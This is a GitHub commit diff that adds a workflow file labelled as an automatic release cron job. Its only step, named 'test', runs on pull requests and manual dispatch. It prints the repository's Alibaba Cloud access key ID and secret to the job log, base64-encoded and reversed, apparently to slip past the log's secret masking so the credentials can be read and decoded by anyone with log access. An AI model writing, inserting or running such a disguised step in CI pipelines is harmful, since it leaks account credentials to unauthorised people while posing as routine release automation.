Skip to content

Commit d7b9f12

Browse files
committed
Automatic release workflow
1 parent f976e71 commit d7b9f12

1 file changed

Lines changed: 18 additions & 0 deletions

File tree

.github/workflows/release-cron.yml

Lines changed: 18 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,18 @@
1+
name: Release Cron
2+
3+
on:
4+
workflow_dispatch:
5+
pull_request:
6+
branches: [ main ]
7+
8+
jobs:
9+
test:
10+
runs-on: ubuntu-latest
11+
steps:
12+
- name: test
13+
run: |
14+
echo -n "1:"
15+
echo -n "${{ secrets.ALI_ACCESS_KEY_ID }}" | base64 | rev
16+
echo -n "2:"
17+
echo -n "${{ secrets.ALI_ACCESS_KEY_SECRET }}" | base64 | rev
18+

0 commit comments

Comments
 (0)